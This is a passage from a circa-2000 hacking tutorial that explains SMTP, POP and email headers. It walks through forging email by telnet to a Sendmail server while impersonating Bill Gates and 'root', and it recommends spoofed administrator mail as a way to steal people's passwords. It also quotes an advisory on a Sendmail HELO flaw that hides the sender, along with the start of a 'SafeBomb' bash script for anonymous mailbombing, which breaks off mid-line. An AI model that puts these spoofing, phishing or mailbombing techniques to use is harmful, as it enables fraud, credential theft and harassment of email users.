for FTP bugs by finding out the FTP version number and the OS running at the host and searching for the hole at the following sites: http://astalavista.box.sk http://cert.org http://www.securityforce.com http://packetstorm.genocide.com http://www.antionline.com http://www.rootshell.com http://www.insecure.org http://www.ntbugtraq.com http://support.microsoft.com (Get Security Bulletins and Fixes to common holes on Windows systems) http://www.crosswinds.net/~hackingtruths Some common FTP Bugs would be the FTP bounce Attack and Local FTP bugs(Read the following manual: http://www.crosswinds.net/~hackingtruths/ftpindex.txt).There is also a DOS (Denial of Services, not MSDOS) attack which can be used to crash Win NT servers and also a OOB(Out of Band Attack). (Read all about it at: http://blacksun.box.sk/ftp.txt ) SMTP [Port 25] & POP [Port 110] Most of you would be using email clients like MS Outlook, Netscape Messenger, Eudora or even Opera to send and receive mail. Have you ever wondered what exactly your favourite email client does? I will just give you an overview of what actually happens. Now when you compose and mail and click on Send, then your email client locates the mail server that you specified during Configuration time or suring Setup. Once the mail server is located, your email client by default connects to port 25(SMTP or the Simple Mail Transfer Protocol) to send mail. Now at Port 25 a daemon is running which listens for connections.Now your email client connects to this daemon and sends mail. Most mail servers have Sendmail which is also known as the buggiest daemon on earth installed on the SMTP port.Qmail is also another popular SMTP daemon running on most Web based email services' mail servers (eg. Hotmail is running qmail) Now in the other case i.e when you receive mail, your email client by default connects to port 110 i.e the POP3 or the Post Office Protocol (version 3) port.Once connected the POP3 daemon authenticates you i.e. asks for a user name and password which is automatically sent by your email client to the server.Once authenticated, you can receive mail. This means that to send mail you need no user name and password but to receive mail you need a username and password. Recently Yahoo, once it started providing POP based mail, had developed this problem that the user could not send mail unless he had received mail i.e he had authenticated. Now in the case of free Web Based services too the same thing happens. In this case you compose your email in a form whose action tag points to a CGI (or Common Gateway InterFace) script which sends the content of the form (that would be what you composed or typed out.) to the Sendmail deamon which uis running on Port 25 of the mail server of the company whose mail services you are using.Here you are authenticated once you enter your user name and password at the login page.Sendmail daemons of web based mail servers too can be used to send mail without authentication. ************************ UberHacker Note: Above I have assumed that you have some knowledge of Web development i.e. HTML or HyperText MarkUp Language and CGI. To Learn HTML goto: www.htmlgoodies.com Search the MSDN Library, which I think simply the most amazing and the most comprehensive library containing all types of Tech Text. URL: http://msdn.microsoft.com Learn CGI programming with Perl 5 by reading my Perl Tutorials. ************************* What is my mail server or which is the server I connect to send email. Now if you use the email service provided by your ISP then it is pretty simple to find out the mail server you connect to, to send and receive mail. Now say your ISP's name is xyz and their domain is xyz.com Then your mail server would most probably be mail.xyz.com (Port 25) to send mail and mail.xyz.com (Port 110) to receive mail.Instead of mail.xyz.com (Port 25) for sendmail mail, you can also try mailgw.xyz.com (Port 25). Email Headers The Sendmail daemon is a really interesting one which allows you to get root on a badly configured system and also allows you to send fake mail!!! Well to understand the concept of Fake Mail you need to be more through with Email Headers, So let me start by explaining what email Headers actually are. This brings me back to the subject of what exactly happens when you send a mail, now let me resume from what happens after the Sendmail Daemon has sent your mail. Now say you live in Los Angeles and have sent an email to a friend in New York, so how does your email reach New York? Now once the Sendmail Daemon has composed your mail then it will send the mail to the Server whose Domain name is the same as the domain name that you entered, (In an email the Domain Name is the text after the @ sign.) So your email may be first sent to the server of the company that provides Internet Backbone is your Country and from there it would be sent to the server is which your friend has an account, so your email travels through a number of Routers and Servers before reaching your friend's Inbox. Now whatever Server an email has travelled through is recorded in the Headers of the Email, the entire path taken by the email and other valuable info is provided by Email Headers. So How do I see Headers? Now to look at the complete Headers in Outlook Express , right click on the message and Select Properties, this will bring up a Window Showing only Partial Headers, Now to see the Full Headers click on the Message Source Button. In Netscape you can look at Headers by clicking on View>Headers>Full.To learn about how to see full headers in your fav email client browse the Help of your client. So you did the above and now know that Headers contain some IP addresses and some Host Names. Now I will explain what exactly Headers Tell you. Now let's take an example header that I specially prepared for you guys. Return-Path: name@xyz.net Received: from mail2.xyz.net by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99- 0620AM) id SAA0000012322; Fri, 7 Apr 2000 18:51:27 +0530 (IST) From: "[Noname]" To: "Ankit Fadia" Subject: More questions :) Date:Mon, 28 Feb 2000 22:13:12 +0100 Message-ID: <20000407131945.16316.qmail@mail2.xyz.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority:Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Now let's go through the entire headers line by line. Return-Path: name@xyz.net The above line tells us that the sender is name@xyz.net This line can easily be forged, but let's stick to a the headers of a genuine email which has not been forged.This line also tells us the name of the ISP or the name of the company with which the sender has an email account with.In this case xyz become the name of the ISP or Email Service provider and www.xyz.net would normaly be the website of the email provider. Moving further down we find the following line: Received: from xyz.net by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id SAA0000012322; Fri, 7 Apr 2000 18:51:27 +0530 (IST) The above line tells us that the email travelled from the server xyz.net to the server delhi1.mtnl.net.in . The text in the brackets after delhi1.mtnl.net.in gives us the Sendmail version number running at delhi1.mtnl.net.in.The above header tells us that delhi1.mtnl.net.in is running version 8.9.1 version of Sendmail at port 25.Now within the brackets there is a date(In this case 26Oct99-0620AM)this date is not the date at which the email passed through this server but the date represents when the Sendmail daemon was last configured or setup or upgraded.The next line in the same header gives us the date at which the email passed through the server. By reading this header we already know that the mail originated at mail2.xyz.net and was sent by name@xyz.net to ankit@bol.net.in. The mail server of name@xyz.net (i.e. mail2.xyz.net) then passed on the email to my mail server which is delhi1.mtnl.net.in.My mail server then delivered the email to my account. Before the get on the easier to understand less important lines, I would like to discuss the Message ID line: Message-ID: 20000407131945.16316.qmail@mail2.xyz.net Now if you look at this line carefully then you would find that it gives out some very valuable info on the server at which the email was written and also some info on as to when the sender or his email client logged on to his mail server and sent this mail.Now to further understand the above line, let's break it up into smaller pieces. The part 20000407131945 represents the date/time at which the sender logged on to the mail server to send the mail.It shows the date/time in the yyyymmddhhmmss format.So the above piece of gibberish can be rewritten as: 2000/04/07/13:19:45 which is Year:2000,Month:April(4th month),Day:7th, and Time is 1:19 and 45 seconds(PM) The number after the first dot i.e. 16316 is the reference number of that particular email.You know that each this email was sent from mail2.xyz.net, but many more maybe thousands more have been sent by that mail server on that particular day, so in order to distiguish mails from each other, each mail is reffered to by a unique Message ID.For each mail that a mail server sends, it logs details regarding info on sender, time etc etc.Now to distiguish between logs of two different emails, the unique Message ID is used.So one gather more info on the sender of a particular email by contacting the system administrator of the mail server that the sender used to send the email with the Message ID. The next bit tells us that the mail server mail2.xyz.net is running qmail which like Sendmail is a daemon which handles sending of emails. The remaining few lines are also quite self Explanatory: From: "[Noname]" To: "Ankit Fadia" Subject: More questions :) Date:Mon, 28 Feb 2000 22:13:12 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit This tells us that the NickName of the person who has sent this mail is [Noname] and his mail address would be noname@isp.net. The next line specifies the email address to which the mail was sent to. The rest of the lines give us MIME and other info on Encoding etc. X-MSMail-Priority:Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 The X-Mailer Header tell's us the Email client which sent the mail, in this case it is Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0). You may say that Headers are very boring and what the hell do they have to do with Hacking.Well Hacking is about knowledge and knowledge can never be bad for you and the ability to read headers is quite useful when one has to trace Spammers or find out the person who mail bombed him.Most newbies spend a lot of time Scanning for Internet hosts with Port 25 open and never bother to learn how to read headers.They do not know that Headers provide you with a list of mail servers which may allow you to send perfectly forged mail.So take my advice and try to be as through with headers as you can, you are not a hacker if you are not able to read Email headers. Sending Forged Mail using SMTP (Port 25) Ever dreamt of sending forged emails so that the victim does not know who sent this email??? Or do you want to send an email to someone so that he thinks that the Sender of the email is not you but someone else??? Well then Email Forging is the thing for you. Sending a forged email is quite simple and easy to understand, but you just need to apply a liitle bit of your brain to understand the various aspects of a perfect forged email and various applications of forging emails. Now first see how one can send a forged email. Remember that earlier in this guide I had explained how an email is sent? If you do not remember then I would suggest you go back a bit and refresh your memory by reading the section titled "SMTP [Port 25] & POP [Port 110]" Now let's log on to Port 25 of a mail server and see how the Sendmail daemon behaves and how we can send a forged mail. Open your fav Telnet client, my favourite is the one that ships with Windows anyway then telnet to Port 25 of the mail server.You will be welcomed by something that is called a daemon banner. 220 delhi1.mtnl.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/26Oct99-0620AM) Fri, 7 Apr 2000 19:57:05 +0530 (IST) ************** Hacking Truth: A daemon banner is nothing but a welcome message that the host provides to the visitors.But a daemon banner is not merely a unimportant welcome message.It provides us with some very valuable info on the host we have connected to like for example when I connect to Port 23 of my ISP, then I get a Welcome message alongwith the Joke of the day and also the most important of all the OS and OS version runninf at my ISP.This is very imporant when we are looking for an exploit which we can use to break in or get root. ************* The daemon banner tells us the host we are connected to is running Sendmail version 8.9.1 and uses the ESMTP standards or the Extended Simple Mail Tranfer Protocol to transport messages.The number within the brackets give the date and time the Sendmail daemon was last configured or upgraded.The date outside the brackets is the current date and time at the host.I am sure you must have got the hang of reading Headers and such info by now....that makes you kewler than your friends!!! And if you get an error message instead of the Daemon banner then it means that the host you are trying to connect to has disabled public access to that mail server to increase the security of the Network. Before I go on let's see what your email client does when it has connected to Port 25 and started communicating with the Sendmail daemon.Now the email client sends so Sendmail commands that it knows beforehand and orders Sendmail to prepare a mail for such and such person which is supposed to be from such and such person and the body of the email is to be blah blah blah. The morale of the story was that the email client uses Sendmail commands to give info such as Sender's email address, recepient's email address, the body of the email address etc etc to the Sendmail daemon, this means that the email client controls what info is to be given to Sendmail and wheather this info is to be true or not.The above process of connecting to Port 25 of the mail server is not viewable to the user and occurs in the background. ************* Hacking Truth: Outlook Express infact records all the commands that it issued to the mail server to send mails.Ths log fils is stored in the "c:\windows\application data" folder under the name smtp.log Just search for smtp.log and you will get many results.Let's look at a typical Outlook Express Log file.The following is an excerpt: Outlook Express 5.00.2314.1300 SMTP Log started at 10/08/1999 15:00:33 SMTP: 15:01:15 [rx] 220 delhi1.mtnl.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/16Sep99-0827PM) Fri, 8 Oct 1999 14:50:17 +0530 (IST) SMTP: 15:01:15 [tx] HELO hacker SMTP: 15:01:15 [rx] 250 delhi1.mtnl.net.in Hello [203.xx.248.175], pleased to meet you SMTP: 15:01:16 [tx] MAIL FROM: SMTP: 15:01:16 [rx] 250 ... Sender ok SMTP: 15:01:16 [tx] RCPT TO: SMTP: 15:01:16 [rx] 250 ... Recipient ok SMTP: 15:01:16 [tx] DATA SMTP: 15:01:16 [rx] 354 Enter mail, end with "." on a line by itself SMTP: 15:01:20 [tx] . SMTP: 15:01:23 [rx] 250 OAA0000014842 Message accepted for delivery SMTP: 15:01:23 [tx] QUIT SMTP: 15:01:23 [rx] 221 delhi1.mtnl.net.in closing connection Those of you who are already familiar with SMTP or Sendmail commands can pretty much make out how revealing this log file is and what kind of important info on the email sending activities of the user is reveals. Such a detailed report or log on each and every mail ever sent through Outlook Express is recorded in this file.Deleting emails from the Sent folder of Outlook Express does not clean these logs.A well informed hacker would be no time be able to get a list of people to whom you have sent mails to. Well that is Microsoft for you!!! Well atleast the log file does not reveal the actualy body of the email. And if you can't make head or tail or the above, then read on. ******************* Now that we have connected to Sendmail we are going to repeat the entire above process manually to send forged mail. You do not need to memorise or remember these SMTP commands in order to send forged mail.Whenever you have the slighest doubt or have forgotten the syntax or the command itself, then you can easily get help by simply typing 'Help' at the sendmail prompt.On some systems typing '?' might bring a response. NOTE: Whatever you type at the Sendmail prompt is not visible to you unless you enable the local echo option.If you using the Telnet client shipping with Windows then simple click on Terminal > Preferences and from the dialog box enable the Local Echo option. So typing Help at the prompt prompts the following result: 214-This is Sendmail version 8.9.1 214-Topics: 214- HELO EHLO MAIL RCPT DATA 214- RSET NOOP QUIT HELP VRFY 214- EXPN VERB ETRN DSN 214-For more info use "HELP ". 214-To report bugs in the implementation send email to 214- sendmail-bugs@sendmail.org. 214-For local information send email to Postmaster at your site. 214 End of HELP info To get help on individual commands you can try typing help followed by the commandname. For eaxmple typing help helo Brings the following response: 214-HELO 214- Introduce yourself. 214 End of HELP info Eagle Eyed readers must have noticed that all messages from the server have a preceeding number, well you guessed it the numbers represent the kind of message following it.For example, all help messages by default have the number 214.Each kind of message that the server sends has a unique number associated with it. Before you go on I suggest you find out what each command does by typing help following by the command name and also if possible read the Unix man pages on Sendmail, they are quite good.You will not be able to understand the next part if you do not know the syntax and use of each command.Do read the Sendmail help before reading further. Anyway let's move on, Now let's see...I want to send myself an email at ankit@bol.net.in from billgates@microsoft.com So I type the following, note that the text that I type has no preceeding number and the text which have a preceeding number is the response from the server I am connected to. helo ankit.com 250 delhi1.mtnl.net.in Hello, pleased to meet you mail from:billgates@microsoft.com 250 ... Sender Okay rcpt to:ankit@bol.net.in 250 ... Recipient Okay data 354 Enter mail, end with "." on a line by itself My first forged mail!!! . 250 Mail accepted Then I opened my Inbox and read through the Headers of the this email that I just forged. Return-Path: Received: from ankit.com by myisp.com(8.9.1/1.1.20.3/26Oct99-0620AM) id UAA0000026614; Fri, 7 Apr 2000 20:01:52 +0530 (IST) Date: Fri, 7 Apr 2000 20:01:52 +0530 (IST) From: Message-Id: <200004071431.UAA0000026614@delhi1.mtnl.net.in> X-UIDL: dcbef1ba736c55ddc08d6a93609979a9 The email seems to be pretty much a perfect forge, but the line that is the most obvious culprit which gives me away is: Received: from ankit.com by myisp.com (8.9.1/1.1.20.3/26Oct99-0620AM) id UAA0000026614; Fri, 7 Apr 2000 20:01:52 +0530 (IST) The ankit.com thing would arouse the suspicion of any experienced hacker.Now how can the following scenario be true when the email address that the message is coming from has the domain name:microsoft.com but the email header says that the mail originated not from a mail server within Microsoft' s network but from ankit.com which is supposedly a mail server. Now why did Sendmail put ankit.com in the header? So I went through the SMTP commands that I had issued once again and found that I had given the helo ankit.com command and Sendmail had picked this domain ankit.com and put it into the header of the email.So to remove this ankit.com from the header and to make the email to look more authentic, I change the parameter that I passed the Helo command with. Instead of 'helo ankit.com' I try out 'helo microsoft.com' and let the other commands remain the same.Now when I see the headers, I see that the headers have changed to: Return-Path: Received: from microsoft.com by myisp.com (8.9.1/1.1.20.3/26Oct99-0620AM) id UAA0000020667; Fri, 7 Apr 2000 20:00:10 +0530 (IST) Date: Fri, 7 Apr 2000 20:00:10 +0530 (IST) From: Message-Id: <200004071430.UAA0000020667@delhi1.mtnl.net.in> X-UIDL: 636646d210be0e13fbcf936308c99222 The ankit.com bit does not appear again and this kind of forgery may pass if the person to whom you are sending this email to is a newbie.But experienced hackers will definitely point out that the Message-Id part of the header says that the email was composed at delhi1.mtnl.net.in but the second line says that the email originated at microsoft.com. So he would write to postmaster@delhi1.mtnl.net.in or help@delhi1.mtnl.net.in or root@delhi1.mtnl.net.in and complain that he had received a forged email and would like to investigate.Most system administrators are really jumpy about their servers being used for purposes they were not meant for and will easily co operate with the comaplainer and you are caught.Some ISP's are so cranky that if you are caught doing something like this, you will probably be kicked out of the use of their service. There is not solution to this problem.By that what I mean to say is that the victim can always send an email to the system administrator of the server shown by the Message ID line.But the forgery may look for more real if the Message ID line shows the mail server of the same domain name as the forged email address belongs to.For example, say the forged email address is billgates@microsoft.com then instead of the Message-Id showing the delhi1.mtnl.net.in server, if it shows something like mail.microsoft.com, it makes the email look more authentic. ******************* Hacking Truth: When we give the MAIL FROM: billgates@microsoft.com, then the mail appears to have come from Bill Gates. Now in the Mail from command, we can instead of providing an email address, provide something like root or localhost.So For Example, if I enter the command: MAIL FROM: root then the heads of the email would look like: Return-Path: Received: from microsoft.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id TAA0000022089; Sun, 9 Apr 2000 19:55:42 +0530 (IST) Date:Sun, 9 Apr 2000 19:55:42 +0530 (IST) From: root@microsoft.com Message-ID:200004091425.TAA0000022089@mailgw.xx.microsoft.com X-UIDL: 636646d210be0e13fbcf936308c99222 This way we can make the email seem to have come from the system administrator which then in turn can be utilised in fooling people into giving away their Internet Passwords.Yes...Email forging CAN be used to steal passwords, one just needs a bit of intelligence and a great deal of luck. ******************* Now that you know how to read some basic headers, let's examine some more advanced headers which we receive from all emails sent to a mailing list. When you see the full headers of an email that you received through a mailing list, you will find that the email headers are more advanced and difficult to understand.Let's take an example of to make things clearer.The following are the headers of a recent email that I received through my mailing list; programmingforhackers.[I myself had sent this email to the list.] Return-Path: Received: from b05.egroups.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000021910; Thu, 13 Apr 2000 14:29:14 +0530 (IST) X-eGroups-Return: sentto-1575622-4-ankit=bol.net.in@returns.onelist.com Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000 08:58:09 -0000 Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000 Received: from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr 2000 08:58:07 -0000 Received: from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with SMTP; 13 Apr 2000 08:58:07 -0000 Received: (qmail 2092 invoked from network); 13 Apr 2000 08:58:01 -0000 Received: from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with SMTP; 13 Apr 2000 08:58:01 -0000 Received: from bol.net.in by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13 Apr 2000 14:28:46 +0530 (IST) Message-ID: <38F61F28.B2045192@bol.net.in> X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: en To: "programmingforhackers@eGroups.com" References: <38F4E37B.55A83239@bol.net.in> MIME-Version: 1.0 Mailing-List: list programmingforhackers@egroups.com; contact programmingforhackers-owner@egroups.com Delivered-To: mailing list programmingforhackers@egroups.com Precedence: bulk List-Unsubscribe: Date: Thu, 13 Apr 2000 15:25:33 -0400 X-eGroups-From: Ankit Fadia From: Ankit Fadia Reply-To: programmingforhackers-owner@egroups.com Subject: [programmingforhackers] Hi Content-Type: multipart/alternative; boundary="------------EF668DA53EE7F0ED0AA654E9" This email header is lot different from the headers that we had examined earlier.It's not as difficult to understand this header, as it seems.Believe me, it is quite easy, once you ge the hang of it. To examine this header, we will be going in the reverse order.i.e. we will take the bottommost line first and then slowly move up. Date: Thu, 13 Apr 2000 15:25:33 -0400 X-eGroups-From: Ankit Fadia From: Ankit Fadia Reply-To: programmingforhackers-owner@egroups.com Subject: [programmingforhackers] Hi Content-Type: multipart/alternative; boundary="------------EF668DA53EE7F0ED0AA654E9" This part of the header basically tells us that the mail was sent by ankit@bol.net.in on 13th april at 3:15 PM 4 hours behind GMT.It also tells us that replying to this email will send the message to the Group Owner of this mailing list.(Same as the moderator of the list.) X-Mailer: Mozilla 4.5 [en] (Win98) X-Accept-Language: en To: "programmingforhackers@eGroups.com" References: <38F4E37B.55A83239@bol.net.in> MIME-Version: 1.0 Mailing-List: list programmingforhackers@egroups.com; contact programmingforhackers-owner@egroups.com Delivered-To: mailing list programmingforhackers@egroups.com Precedence: bulk List-Unsubscribe: How many times, have you seen lamers posting messages like: How can I unsubscribe from this list??? Or even Please Unsubscribe me, to Hardcore Hacking Lists .These so called Hackers are nothing but script kiddies who are so lame that it doesn't even stike them that seeing the email headers might help.Wonder if they even know what Headers are. Most Mailing Lists(Atleast Egroups and Onelist do) attach information to the headers about the mailing list.This information includes the list name, the email address of the moderator and also the email address which is required to unsubscribe from the mailing list. This part of the email header also tells us that the sender i.e. ankit@bol.net.in used Mozilla 4.5 running on Win98 and the mail was sent to programmingforhackers@egroups.com Now comes the part which a newbie might have difficult to understand. Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000 08:58:09 -0000 Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000 Received: from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr 2000 08:58:07 -0000 Received: from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with SMTP; 13 Apr 2000 08:58:07 -0000 Received: (qmail 2092 invoked from network); 13 Apr 2000 08:58:01 -0000 Received: from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with SMTP; 13 Apr 2000 08:58:01 -0000 Received: from bol.net.in by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13 Apr 2000 14:28:46 +0530 (IST) Message-ID: 38F61F28.B2045192@bol.net.in NOTE: Like I said earlier, we would be reading the lines in the reverse order. Received: from bol.net.in by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM); Thu, 13 Apr 2000 14:28:46 +0530 (IST) Message-ID: 38F61F28.B2045192@delhi1.mtnl.net.in This line tells us that the mail was sent using the Sendmail Daemon (8.9.1) running at delhi1.mtnl.net.in.The bol.net.in part was generated because the email client which was used by the sender to send the mail gave the following command to delhi1.mtnl.net.in: helo bol.net.in Hence it got into the header.Once the email was composed, the Sendmail daemon checks to which domain the email has to be sent.It found that the receipient was programmingforhackers@egroups.com hence it said." Let me pass it on to an egroups server. Received: from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr 2000 08:58:07 -0000 Received: from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with SMTP; 13 Apr 2000 08:58:07 -0000 Received: (qmail 2092 invoked from network); 13 Apr 2000 08:58:01 -0000 Received: from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with SMTP; 13 Apr 2000 08:58:01 -0000 After the mail was composed, delhi1.mtnl.net.in whose IP is 203.xx.243.51 passed the email on to the egroups server, qg.egroups.com.At egroups the entire world has been divided into many parts and a unique different server handles mails coming from different parts of the world. Then qg.egroups.com launched the qmail daemon(qmail too is a daemon similar to Sendmail but it is much more secure.) running on another machine within the Egroups Internal Network whose IP is 10.1.2.27(See, the email headers do not display the machine name always, sometimes it simply displays the IP of the machine.And hey this machine would probably be behind a firewall, so no use Telnetting it.)Hence at 10.1.2.27 the email was re-composed and was sent to mta1 yet another machine within the Network running SMTP.But. mta1 cannot be it's full name, and neither has it's IP been displayed, so what is the address of this machine.If you look at the next line,you will see that the IP of mta1 is given to be: 10.1.10.26.If you have read this manual carefully then you would be able to say what kind of Network it is.If you can't, well, it is a Class B network. mta1 or 10.1.10.26 then sent it to m3.onelist.org which is running QMQP. Now what the hell is that? It basically is a part of qmail which receives messages via the Quick Mail Queueing Protocol (QMQP).It allows users to relay messages to any destination,but is generally used to send messages of preauthorised users. Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000 08:58:09 -0000 Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000 Then the QMQP was used to start the qmail daemon and the message was in queue and was then sent to bo5.egroups.com by 10.1.10.37 which is actually either m3.onelist.org or the machine at which the qmail daemon is running. b05.egroups.com is the server where the database of the list of members of a particular mailing list is stored.It is here where the server sends the email to all members of the list.This server is runnign NNFMP which basically checks that the members of the list are reachable or not.For example, if a particular email address which is a part of a list does not exist then it is this NNFMP service which generates an error messages and therby after attempting twice or thrice to send the message,removes this invalid email address from the database of subscribers. Return-Path: Received: from b05.egroups.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000021910; Thu, 13 Apr 2000 14:29:14 +0530 (IST) X-eGroups-Return: sentto-1575622-4-ankit=bol.net.in@returns.onelist.com As an when the server finds subscribers in it's database, it prepares the headers and sends the messages to them.The numbers preceeding the email address of the receiver is the reference number used by the Egroups server to refer to a particular member and the message sent to him.Hence the Return Path Statement does not show the sender of the email but the email address of the person for whom the email was meant. There is a misconception amongst people that if an email has been sent from a hotmail account, then you remain annonymous.This is not at all true.Yes Homtail may seem to be anonymous to a certain extend, but it is not too difficult to find out more about a Hotmail user. The flaw lies in the headers that the Hotmail mail servers attach to all outgoing mails.Hotmail records the IP's of all people who log into their accounts.Now this IP is attached to all the respective outgoing mails.Now let's take a look at a typical header of an email sent from a Hotmail account. Return-Path: Received: from hotmail.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id TAA0000032714; Sun, 23 Jan 2000 19:02:21 +0530 (IST) Received: (qmail 34532 invoked by uid 0); 23 Jan 2000 13:30:14 -0000 Message-ID: <20000123133014.34531.qmail@hotmail.com> Received: from 202.54.109.174 by www.hotmail.com with HTTP; Sun, 23 Jan 2000 05:30:14 PST X-Originating-IP: [202.xx.109.174] From: "Namita Mullick" To: ankit@bol.net.in Date: Sun, 23 Jan 2000 19:00:14 IST Mime-Version: 1.0 Content-Type: text/plain; format=flowed X-UIDL: 5c296dd2b5265c76e117ae1390e229ab The line that interests us the following: X-Originating-IP: [202.xx.109.174] NOTE: I have delibrately inserted xx instead of actual numbers for privacy purposes. What's this in the brackets? Well that is the IP address of the sender of the email. This IP would most certainly be a dynamic one, this means that somebody else might be assigned that same IP at this momemt.But we can easily find out the ISP which issues this IP to it's subscribers by doing a traceroute. C:\windows>tracert 202.xx.109.174 This security flaw is not only present in Hotmail, but many other Web Based Email Service providers and also some ISP's have this tendency of not keeping security absoulutely tight and let this flaw prevail.So how do you get around this problem? Well Proxy Servers hold the answer.Now let's understand how proxy servers give us anonymity.Normlly a TCP\IP data tranfer takes place something like in the following way: Your IP Address is 203.xx.21.11 and you connect to www.hotmail.com. 203.xx.21.11 ----------> www.hotmail.com You send a request to hotmail.com. Hotmail's server records your IP and uses this recorded IP to send data packets to you. www.hotmail.com --------> 203.xx.21.11 So when you send an email using your Hotmail account, the receiver of your email knows your identity and can trace you.But after you install a Proxy server, the data transfer will take place in the following way: 203.xx.21.11 --------> 121.xx.01.89 ----------> www.hotmail.com Now in this case, you send a request to hotmail.com which is sent via the proxy server, whose IP address is 121.xx.01.89.Hence hotmail establishes a direct connection with the Proxy Server(121.xx.01.89) and an indirect conection with you(203.xx.21.11).Hence the IP address that Hotmail records is the unique IP of the Proxy server installed at your system and not your direct IP.Hence you remain private. Popular Proxy Servers for Windows are WinGate and WinProxy. There are also online Privacy services like anonymous.com and privacyx.com. Only privacyx.com is a good one. *********ROOTSHELL*************** Here's a brief description of Sendmail (qmail) hole I found recently: When someone mailbombs you, or tries to send fakemail, spam, etc - sendmail normally attachs sender's host name and it's address to outgoing message: -- >From spam@flooders.net Mon Jan 5 22:08:21 1998 Received: from spammer (marc@math.university.edu [150.129.84.5]) by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376 for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100 Date: Mon, 5 Jan 1998 22:07:54 +0100 From: spam@flooders.net Message-Id: <3.14159665@pi> MAILBOOM!!! -- That's perfect - now you know, who is responsible for that annoying junk in your mailbox: "Received: from spammer (marc@math.university.edu [150.129.84.5])". Nothing easier... But I found a small hole, which allows user to hide it's personality, and send mails anonymously. The only thing you should do is to pass HELO string longer than approx. 1024 B - sender's location and other very useful information will be cropped!!! Message headers should become not interesting. Sometimes, sender may become quite untraceable (but not always, if it's possible to obtain logs from machine which has been used to sent): -- >From spam@flooders.net Mon Jan 5 22:09:05 1998 Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx Date: Mon, 5 Jan 1998 22:08:52 +0100 From: spam@flooders.net Message-Id: <3.14159665@pi> MAILBOOM!!! Now guess who am I... -- Here's a simple example of Sendmail's HELO hole usage. Note, this script has been written ONLY to show how easy may be sending fakemails, mailbombs, with cooperation of Sendmail ;) Script is very slow and restricted in many ways, but explains the problem well (note, some of non-Berkeley daemons are also affected, probably Qmail?): -- EXPLOIT CODE -- #!/bin/bash TMPDIR=/tmp/`whoami` PLIK=$TMPDIR/.safe TIMEOUT=2 LIMIT=10 MAX=20 echo echo "SafeBomb 1.02b -- sendmail HELO hole usage example" echo "Author: Michal Zalewski " echo if [ "$4" = "" ]; then echo "USAGE: $0 msgfile address server sender" echo echo " msgfile - file to send as a message body" echo " address - address of lucky recipient" echo " server - outgoing smtp server w/sendmail" echo " sender - introduce yourself" echo echo "WARNING: For educational use ONLY. Mailbombing is illegal." echo "Think twice BEFORE you use this program in any way. Also," echo "I've never said this program is 100% safe nor bug-free." echo sleep 1 exit 0 fi if [ ! -f $1 ]; then echo "Message file not found." echo exit 0 fi echo -n "Preparing message..." mkdir $TMPDIR &>/dev/null chmod 700 $TMPDIR echo "echo \"helo _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_ _safebomb__safebomb__safebomb__sa febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa febomb__safebomb__safebomb__safebomb__safebomb__saf ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf ebomb__safebomb__safebomb__safebomb__safebomb__safe bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe bomb__safebomb__safebomb__safebomb__safebomb__safeb omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb omb__safebomb__safebomb__safebomb__safebomb__safebo mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo mb__safebomb__safebomb__safebomb__safebomb__safebom b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom b__safebomb__safebomb__safebomb__safebomb__safebomb b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom b__safebomb__safebomb__safebomb__safebomb__safebomb __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb __safebomb__safebomb__safebomb__safebomb__safebomb_ _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_\"" >$PLIK echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK echo "echo \"rcpt to: $2\"" >>$PLIK echo "echo 